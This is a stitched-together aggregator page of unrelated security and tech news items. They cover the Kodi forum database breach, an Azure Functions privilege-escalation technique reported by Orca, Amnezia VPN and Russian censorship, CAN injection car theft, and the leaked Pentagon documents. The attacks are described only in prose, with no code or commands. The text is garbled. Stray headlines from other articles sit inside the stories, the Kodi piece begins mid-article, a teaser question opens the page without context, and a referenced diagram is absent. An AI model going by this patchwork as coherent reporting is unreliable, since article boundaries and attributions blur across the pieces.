Now You: How do you handle cookies in your browsers?

All Firefox users are now protected better against online tracking

Note: Kodi software, the latest release is Kodi 20, was not affected by the breach in any way.

Initial investigation into the matter revealed that the attacker breached a forum admin account of an inactive, but trusted, member, and managed to access the admin console twice. This happened in mid-February of 2023.

The admin account was used to create backups of the databases, which were then downloaded.

Kodi disabled the account in question to prevent future access to the systems, once it became aware of the incident. It also "conducted an initial review of team infrastructure the team member had access to", reported the incident to the UK police and notified the UK Information Commissioner's Office.

The downloaded database backups "expose all public forum posts, all team forum posts, all messages sent through the user-to-user messaging system, and user data including forum username, email address used for notifications, and an encrypted (hashed and salted) password generated by the MyBB (v1.8.27) software".

Users of the forum should assume that their "Kodi forum credentials and any private data shared with other users through the user-to-user messaging system is compromised".

While passwords are encrypted, Kodi considers them compromised and thus burned. Kodi announced the following plans to deal with the breach:

• All exposed email data will be shared with Have I Been Pwned, a site to check, whether an email address has been part of a breach.
• Kodi plans to perform a global password reset. This resets all passwords and prevents further compromise or access to personal data. Kodi forum users need to change passwords at other services, if they re-used the password.
• The latest version of the forum software is redeployed currently. Since this means comparison with the old version, the forum will remain offline for a few days at least. Access to the admin console will be further restricted and hardened.

The global password reset will likely happen once the forums go back online. Users will be informed by email about the reset, and they need to set a new password on the first visit to the forum.

Now You: are you a Kodi user?

Kodi confirms user forum data breach

"It is possible to abuse and leverage Microsoft Storage Accounts by manipulating Azure Functions to steal access-tokens of higher privilege identities, move laterally, potentially access critical business assets, and execute remote code (RCE)," Orca said in a new report shared with The Hacker News.

The exploitation path that underpins this attack is a mechanism called Shared Key authorization, which is enabled by default on storage accounts.

According to Microsoft, Azure generates two 512-bit storage account access keys when creating a storage account. These keys can be used to authorize access to data via Shared Key authorization, or via SAS tokens that are signed with the shared key.

"Storage account access keys provide full access to the configuration of a storage account, as well as the data," Microsoft notes in its documentation. "Access to the shared key grants a user full access to a storage account's configuration and its data."

The cloud security firm said these access tokens can be stolen by manipulating Azure Functions, potentially enabling a threat actor with access to an account with Storage Account Contributor role to escalate privileges and take over systems.

Specifically, should a managed identity be used to invoke the Function app, it could be abused to execute any command. This, in turn, is made possible owing to the fact that a dedicated storage account is created when deploying an Azure Function app.

"Once an attacker locates the storage account of a Function app that is assigned with a strong managed identity, it can run code on its behalf and as a result acquire a subscription privilege escalation (PE)," Orca researcher Roi Nisimi said.

In other words, by exfiltrating the access-token of the Azure Function app's assigned managed identity to a remote server, a threat actor can elevate privileges, move laterally, access new resources, and execute a reverse shell on virtual machines.

"By overriding function files in storage accounts, an attacker can steal and exfiltrate a higher-privileged identity and use it to move laterally, exploit and compromise victims' most valuable crown jewels," Nisimi explained.

As mitigations, it's recommended that organizations consider disabling Azure Shared Key authorization and using Azure Active Directory authentication instead. In a coordinated disclosure, Microsoft said it "plans to update how Functions client tools work with storage accounts."

"This includes changes to better support scenarios using identity. After identity-based connections for AzureWebJobsStorage are generally available and the new experiences are validated, identity will become the default mode for AzureWebJobsStorage, which is intended to move away from shared key authorization," the tech giant further added.

The findings arrive weeks after Microsoft patched a misconfiguration issue impacting Azure Active Directory that made it possible to tamper with Bing search results and a reflected XSS vulnerability in Azure Service Fabric Explorer (SFX) that could lead to unauthenticated remote code execution.

Source

THE RUSSIAN GOVERNMENT has banned more than 10,000 websites for content about the war in Ukraine since Moscow launched the full-scale invasion in February 2022. The blacklist includes Facebook, Twitter, Instagram, and independent news outlets.

Over the past year, Russians living inside the country have turned to censorship circumvention tools such as VPNs to pierce through the information blockade.

But as dozens of virtual private networks get blocked, leaving users scrambling to maintain their access to free information, local activists and developers are coming up with new solutions. One of them is Amnezia VPN, a free, open source VPN client.

“We even do not advertise and promote it, and new users are still coming by the hundreds every day,” says Mazay Banzaev, Amnezia VPN’s founder.

Unlike commercial VPNs that route users through company servers, which can be blocked, Amnezia VPN makes it simple for users to buy and set up their own servers. This allows them to choose their own IP address and use protocols that are harder to block.

“More than half of the commercial VPNs in Russia have been blocked because it’s easy enough to block them: They do not block them by protocols, but by IP addresses,” says Banzaev. “[Amnezia] is an order of magnitude more resilient than a typical commercial VPN.”

Amnezia VPN is similar to Outline, a free and open source tool developed by Jigsaw, a subsidiary of Google. Amnezia was created in 2020 during a hackathon supported by Russian digital rights organization Roskomsvoboda. Even then, “it was clear that things were moving toward stricter censorship,” says Banzaev.

Russian authorities have been attempting to control tools such as VPNs and anonymous proxy servers for years, including by introducing a law regulating these tools in 2017. Since Russia's invasion of Ukraine, however, the Kremlin has escalated its efforts to control information. 

Just days after Russian troops headed toward Kyiv, Ukraine’s capital, Vladimir Putin signed legislation that criminalizes spreading "fake" information about the war, with a penalty of up to 15 years in prison. Most independent news outlets are now blocked, with editors and journalists ending up in prison, leaving Russians with state propaganda.

This has made VPNs and other censorship circumvention tools all the more important, says Stanislav Shakirov, cofounder of Roskomsvoboda and founder of tech development organization Privacy Accelerator. “If internet users in Russia stop receiving information other than state information,” he says, “we will have no hope of any processes leading to a change in the current regime.”

The Kremlin is, of course, not giving up on its crackdown. In September 2022, Roskomnadzor, the main government body responsible for internet censorship, announced it would block six popular VPN services, including ExpressVPN and NordVPN. This was followed in March 2023 by announcements that VPNs refusing to provide data to domestic intelligence agencies would be blocked in Russia, as well as proposals to restrict anonymization tools such as virtual phone numbers. Messaging app Telegram, which saw a steep rise in popularity in Russia after the invasion, has been offering virtual phone numbers since December 2022.

Although anti-censorship services like Lantern, Psiphon, and Tor are still working in Russia, albeit with some interruptions, authorities have largely been successful in their fight against VPNs, Shakirov says. “The fate of such mass public VPNs in Russia now does not look bright with the current technology stack,” he says.

This has made services such as Amnezia even more popular. It is unclear how many users the service has, since the organization doesn’t have a way to monitor user numbers, Banzaev says. However, Amnezia offers a Telegram bot called AmneziaFree, which shares VPN configurations that help users access blocked platforms and news; it has almost 100,000 users. The bot is currently struggling with overload, and users are complaining about spotty service. Banzaev says the Amnezia team is working to add new servers on a limited budget, and that they are also working on a new version of the service.

Amnezia is not only used in Russia. The service has spread to Turkmenistan, Iran, China, and other countries where users have been struggling with free access to the web.

Source

When a London man discovered the front left-side bumper of his Toyota RAV4 torn off and the headlight partially dismantled not once but twice in three months last year, he suspected the acts were senseless vandalism. When the vehicle went missing a few days after the second incident, and a neighbor found their Toyota Land Cruiser gone shortly afterward, he discovered they were part of a new and sophisticated technique for performing keyless thefts.

 

It just so happened that the owner, Ian Tabor, is a cybersecurity researcher specializing in automobiles. While investigating how his RAV4 was taken, he stumbled on a new technique called CAN injection attacks.

The case of the malfunctioning CAN

Tabor began by poring over the “MyT” telematics system that Toyota uses to track vehicle anomalies known as DTCs (Diagnostic Trouble Codes). It turned out his vehicle had recorded many DTCs around the time of the theft.

 

The error codes showed that communication had been lost between the RAV4’s CAN—short for Controller Area Network—and the headlight’s Electronic Control Unit. These ECUs, as they’re abbreviated, are found in virtually all modern vehicles and are used to control a myriad of functions, including wipers, brakes, individual lights, and engine. Besides controlling the components, ECUs send status messages over the CAN to keep other ECUs apprised of current conditions.

 

This diagram maps out the CAN topology for the RAV4:

 

The DTCs showing that the RAV4’s left headlight lost contact with the CAN wasn’t particularly surprising, considering that the crooks had torn off the cables that connected it. More telling was the failure at the same time of many other ECUs, including those for the front cameras and the hybrid engine control. Taken together, these failures suggested not that the ECUs had failed but rather that the CAN bus had malfunctioned. That sent Taber searching for an explanation.

 

The researcher and theft victim next turned to crime forums on the dark web and YouTube videos discussing how to steal cars. He eventually found ads for what were labeled “emergency start” devices. Ostensibly, these devices were designed for use by owners or locksmiths to use when no key is available, but nothing was preventing their use by anyone else, including thieves. Taber bought a device advertised for starting various vehicles from Lexus and Toyota, including the RAV4. He then proceeded to reverse engineer it and, with help from friend and fellow automotive security expert Ken Tindell, figure out how it worked on the CAN of the RAV4.

Inside this JBL speaker lies a new form of attack

The research uncovered a form of keyless vehicle theft neither researcher had seen before. In the past, thieves found success using what’s known as a relay attack. These hacks amplify the signal between the car and the keyless entry fob used to unlock and start it. Keyless fobs typically only communicate over distances of a few feet. By placing a simple handheld radio device near the vehicle, thieves amplify the normally faint message that cars send. With enough amplification, the messages reach the nearby home or office where the key fob is located. When the fob responds with the cryptographic message that unlocks and starts the vehicle, the crook's repeater relays it to the car. With that, the crook drives off.

 

“Now that people know how a relay attack works … car owners keep their keys in a metal box (blocking the radio message from the car) and some car makers now supply keys that go to sleep if motionless for a few minutes (and so won’t receive the radio message from the car),” Tindell wrote in a recent post. “Faced with this defeat but being unwilling to give up a lucrative activity, thieves moved to a new way around the security: bypassing the entire smart key system. They do this with a new attack: CAN Injection.”

 

There’s a new form of keyless car theft that works in under 2 minutes

This week, the New York Times reported that a tranche of classified material had leaked to the web. The documents, which were purported to involve the Pentagon and NATO’s military stratagems to assist the Ukrainians in their war with the Russians, were found on Twitter and the chat app Telegram.

On Thursday, the Defense Department told the Gray Lady that it’s in the process of investigating how the apparently secret plans had ended up splashed across newsfeeds.

Before the Pentagon could clear that up, however, more documents leaked online. The Times reported Friday that “a new batch of classified documents” had spilled onto social media platforms. This time, the documents initially popped up on 4chan, the rightwing cess pool where digital diseases like QAnon have been known to fester. The new docs appear to cover a broader range of secretive material than the previous ones—allegedly detailing a host of “national security secrets” that involve not only the U.S.’s activities in Ukraine but also the Middle East and China.

Something like this hasn’t happened in quite a long time. Julian Assange is behind bars and Edward Snowden is busy writing a Substack, so there aren’t a ton of digital whistleblowers out there to flush the government’s secret docs into public view. But as officials scramble to figure out what’s going on, a question has quickly emerged: are the documents in these leaks even legitimate?

Indeed, suspicions are swirling that the docs are not what they seem—and the Times is also reporting that both sides of the Russo-Ukrainian war have been referring to it as potential disinformation effort. But if that’s the case, then whose disinformation is it? And what are they trying to disinform us about?

Weirdly, the Pentagon has acknowledged that the documents “are legitimate Defense Department documents, but the copies appear to have been altered in certain parts from their original format,” the Times writes. These edited versions, according to DoD officials, “overstate American estimates of Ukrainian war dead and underestimate estimates of Russian troops killed.”

Ukrainians don’t seem totally convinced of the veracity of the documents, with the Times quoting a “senior Ukrainian official” who thought the leak was a “Russian ploy to discredit a counteroffensive.”

But Russian media, too, would appear to be suspect. On RT.com, one of the nation’s most popular news outlets, an op-ed entitled “Here’s why the leaked ‘secret plan’ for a Ukrainian military offensive doesn’t add up” calls the docs “misinformation” and argues that the documents were “probably prepared and distributed” by “pro-Kiev analysts.” The Times also reports that “pro-war Russian bloggers” had suggested that the leak was part of a “disinformation effort” and a researcher that the Times talked to who studies Russian messaging said that “pro-Kremlin voices were saying the leak was an American or Ukrainian disinformation campaign.”

So, make of that what you will. From here, things look about as clear as mud.

The Justice Department told the Times that it’s opened an investigation into the leaks but has declined to comment further. I don’t think I’m going to hold my breath for any forthcoming results from that investigation but I am pretty damn curious to see what happens next in this little saga.

Source